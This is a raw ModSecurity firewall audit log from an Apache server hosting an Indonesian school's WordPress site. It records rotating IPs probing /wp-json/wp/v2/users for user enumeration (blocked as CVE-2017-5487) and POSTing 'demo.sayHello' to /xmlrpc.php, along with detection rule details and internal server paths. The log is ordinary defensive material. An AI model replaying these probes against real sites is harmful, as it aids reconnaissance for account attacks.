(Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d603f48-Z-- --f89ced7d-A-- [17/May/2025:10:22:32 +0700] aCgA-HyxdQCiyU1ENFcriwAAAA8 103.236.140.4 50870 103.236.140.4 8181 --f89ced7d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f89ced7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f89ced7d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452152305438 2802 (- - -) Stopwatch2: 1747452152305438 2802; combined=1232, p1=428, p2=775, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f89ced7d-Z-- --80fe460e-A-- [17/May/2025:10:22:37 +0700] aCgA_RKi5m5upc8uMd6jhQAAAMo 103.236.140.4 50874 103.236.140.4 8181 --80fe460e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --80fe460e-C-- demo.sayHello --80fe460e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --80fe460e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452157944879 4782 (- - -) Stopwatch2: 1747452157944879 4782; combined=3666, p1=472, p2=2996, p3=23, p4=25, p5=89, sr=69, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80fe460e-Z-- --27386442-A-- [17/May/2025:10:25:50 +0700] aCgBvhKi5m5upc8uMd6jhgAAAMs 103.236.140.4 50892 103.236.140.4 8181 --27386442-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.131 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --27386442-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27386442-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452350700890 2862 (- - -) Stopwatch2: 1747452350700890 2862; combined=1255, p1=449, p2=776, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27386442-Z-- --7ca5477d-A-- [17/May/2025:10:25:56 +0700] aCgBxOm4kjNN-hEbWjJDTAAAAFE 103.236.140.4 50896 103.236.140.4 8181 --7ca5477d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.131 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7ca5477d-C-- demo.sayHello --7ca5477d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ca5477d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452356585234 4482 (- - -) Stopwatch2: 1747452356585234 4482; combined=3511, p1=417, p2=2887, p3=32, p4=23, p5=90, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ca5477d-Z-- --4a9f7b30-A-- [17/May/2025:10:26:37 +0700] aCgB7em4kjNN-hEbWjJDTgAAAFQ 103.236.140.4 50900 103.236.140.4 8181 --4a9f7b30-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.72 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4a9f7b30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a9f7b30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452397830611 3201 (- - -) Stopwatch2: 1747452397830611 3201; combined=1415, p1=477, p2=905, p3=0, p4=0, p5=32, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a9f7b30-Z-- --55cbea25-A-- [17/May/2025:10:26:46 +0700] aCgB9um4kjNN-hEbWjJDUAAAAFg 103.236.140.4 50904 103.236.140.4 8181 --55cbea25-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.72 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --55cbea25-C-- demo.sayHello --55cbea25-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --55cbea25-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452406004013 5668 (- - -) Stopwatch2: 1747452406004013 5668; combined=4154, p1=560, p2=3372, p3=32, p4=35, p5=93, sr=79, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55cbea25-Z-- --89965565-A-- [17/May/2025:10:27:13 +0700] aCgCEQTOsBn9MSWb6WJwDQAAAI0 103.236.140.4 50908 103.236.140.4 8181 --89965565-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --89965565-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89965565-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452433835484 3302 (- - -) Stopwatch2: 1747452433835484 3302; combined=1457, p1=475, p2=950, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89965565-Z-- --cd2da033-A-- [17/May/2025:10:27:21 +0700] aCgCGQTOsBn9MSWb6WJwDwAAAIo 103.236.140.4 50912 103.236.140.4 8181 --cd2da033-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.117 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cd2da033-C-- demo.sayHello --cd2da033-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd2da033-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452441125640 5681 (- - -) Stopwatch2: 1747452441125640 5681; combined=4164, p1=554, p2=3387, p3=35, p4=35, p5=91, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd2da033-Z-- --3d09617d-A-- [17/May/2025:10:28:27 +0700] aCgCWwTOsBn9MSWb6WJwEgAAAJE 103.236.140.4 50918 103.236.140.4 8181 --3d09617d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.20 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d09617d-C-- demo.sayHello --3d09617d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d09617d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452507340016 5690 (- - -) Stopwatch2: 1747452507340016 5690; combined=4186, p1=564, p2=3384, p3=34, p4=45, p5=95, sr=76, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d09617d-Z-- --f682cb4f-A-- [17/May/2025:10:28:36 +0700] aCgCZHyxdQCiyU1ENFcrjgAAABg 103.236.140.4 50922 103.236.140.4 8181 --f682cb4f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f682cb4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f682cb4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452516988376 2765 (- - -) Stopwatch2: 1747452516988376 2765; combined=1252, p1=419, p2=804, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f682cb4f-Z-- --a5eebd3c-A-- [17/May/2025:10:28:42 +0700] aCgCanyxdQCiyU1ENFcrjwAAABU 103.236.140.4 50926 103.236.140.4 8181 --a5eebd3c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.142 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a5eebd3c-C-- demo.sayHello --a5eebd3c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5eebd3c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452522175219 5168 (- - -) Stopwatch2: 1747452522175219 5168; combined=3906, p1=480, p2=3218, p3=27, p4=31, p5=89, sr=68, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5eebd3c-Z-- --983fec12-A-- [17/May/2025:10:28:46 +0700] aCgCbgTOsBn9MSWb6WJwFgAAAJg 103.236.140.4 50930 103.236.140.4 8181 --983fec12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --983fec12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --983fec12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452526111600 2199 (- - -) Stopwatch2: 1747452526111600 2199; combined=1059, p1=319, p2=708, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --983fec12-Z-- --36510b67-A-- [17/May/2025:10:28:52 +0700] aCgCdATOsBn9MSWb6WJwFwAAAIE 103.236.140.4 50934 103.236.140.4 8181 --36510b67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.227 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --36510b67-C-- demo.sayHello --36510b67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --36510b67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452532355466 4625 (- - -) Stopwatch2: 1747452532355466 4625; combined=3607, p1=415, p2=2995, p3=23, p4=24, p5=88, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36510b67-Z-- --08f4097e-A-- [17/May/2025:10:29:09 +0700] aCgChem4kjNN-hEbWjJDUQAAAEI 103.236.140.4 50938 103.236.140.4 8181 --08f4097e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --08f4097e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08f4097e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452549032245 3235 (- - -) Stopwatch2: 1747452549032245 3235; combined=1303, p1=423, p2=852, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08f4097e-Z-- --67a00732-A-- [17/May/2025:10:29:09 +0700] aCgChRKi5m5upc8uMd6jhwAAAMw 103.236.140.4 50940 103.236.140.4 8181 --67a00732-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --67a00732-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67a00732-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452549040188 2801 (- - -) Stopwatch2: 1747452549040188 2801; combined=1237, p1=424, p2=782, p3=0, p4=0, p5=30, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67a00732-Z-- --35c32642-A-- [17/May/2025:10:29:14 +0700] aCgCigTOsBn9MSWb6WJwGQAAAIQ 103.236.140.4 50946 103.236.140.4 8181 --35c32642-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.247 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --35c32642-C-- demo.sayHello --35c32642-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --35c32642-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452554985435 5945 (- - -) Stopwatch2: 1747452554985435 5945; combined=4206, p1=586, p2=3398, p3=30, p4=33, p5=95, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35c32642-Z-- --a7d95e2d-A-- [17/May/2025:10:29:16 +0700] aCgCjATOsBn9MSWb6WJwGgAAAII 103.236.140.4 50948 103.236.140.4 8181 --a7d95e2d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a7d95e2d-C-- demo.sayHello --a7d95e2d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7d95e2d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: 